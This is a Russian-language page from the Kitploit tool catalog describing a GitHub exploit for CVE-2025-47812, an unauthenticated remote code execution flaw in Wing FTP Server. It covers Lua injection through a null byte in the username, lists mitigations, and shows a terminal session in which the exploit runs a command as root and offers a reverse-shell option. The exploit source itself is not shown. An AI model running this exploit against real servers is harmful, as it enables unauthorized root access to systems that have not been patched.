Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Blackash-CVE-2025-47812 — CVE-2025-47812 | Kitploit
Инструменты/GitHubGitHub/dkstar11q/blackash-cve-2025-47812
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийОбучение и ОбразованиеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubdkstar11q/blackash-cve-2025-47812

Blackash-CVE-2025-47812

CVE-2025-47812

Репозиторий
111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

🛡️ CVE-2025-47812 – Критическая RCE-уязвимость в Wing FTP Server 🛡️

🔎 Обзор:

CVE-2025-47812 — это критическая уязвимость удалённого выполнения кода (RCE), затрагивающая Wing FTP Server версий до 7.4.4. Она была обнаружена исследователем безопасности, и подтверждено, что она активно эксплуатируется в реальных атаках.


🧱 Корневая причина:

Уязвимость кроется в логике аутентификации Wing FTP Server, а именно в том, как сервер обрабатывает нулевые байты (\0) в параметре username.

Злоумышленники могут внедрить произвольный Lua-код через поле имени пользователя, который сервер запишет в файл сессии. Когда этот файл сессии обрабатывается позже, внедрённый Lua-код выполняется, что позволяет злоумышленникам запускать команды на уровне системы.


🚨 Воздействие:

  • Серьёзность: оценка CVSS 10.0 (критическая)
  • Требуемый доступ: достаточно неаутентифицированного или анонимного доступа
  • Эксплуатация: подтверждена активная эксплуатация
  • Получаемые привилегии: код выполняется как (Windows) или (Linux/macOS)
Скачать инструмент
SYSTEM
root
  • Затронутые платформы: Windows, Linux и macOS

  • 🔧 Меры по смягчению:

    • Немедленно обновите Wing FTP Server до версии 7.4.4 или более поздней.
    • Убедитесь, что публично доступные FTP-серверы не открывают /loginok.html для недоверенных сетей.
    • Отслеживайте логи на предмет необычных имён пользователей или внедрения Lua-кода.
    • Внедрите сегментацию сети, чтобы изолировать FTP-сервисы от внутренней инфраструктуры.

    💀 Эксплойт:

    root@kitploit:~
    ┌──(kali㉿kali)-[~]
    └─$ sudo python3 CVE-2025-47812.py
    ============================================================
       CVE-2025-47812 - Wing FTP Server RCE Exploit
    ============================================================
    Target URL (e.g., http://localhost:5466): http://10.10.10.10
    Username (e.g., anonymous): anonymous
    1) Run Command
    2) Get Reverse Shell
    Your choice (1 or 2): 1
    Command to execute (default: whoami): id
    [*] Trying to get UID... Payload: id
    [*] UID obtained: 1c3be4345d468da6443947f479c569978ec568a693d569774e7
    [*] Sending /dir.html request...
    [*] HTTP 200
    ------ Response Start ------
    uid=0(root) gid=0(root) groups=0(root)
    <?xml version="1.0" encoding="UTF-8" ?>
    <alldata><nowdir><![CDATA[/]]></nowdir>
    <dirdata>
    </dirdata>
    <nowquota>0</nowquota>
    <maxquota>0</maxquota>
    <readfile>1</readfile>
    </alldata>
    
    
    ------ Response End ------
    

    ⚠️ Отказ от ответственности

    Этот эксплойт предоставлен только в образовательных целях. Используйте его ответственно и только на тех системах, на тестирование которых у вас есть явное разрешение. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый этим инструментом.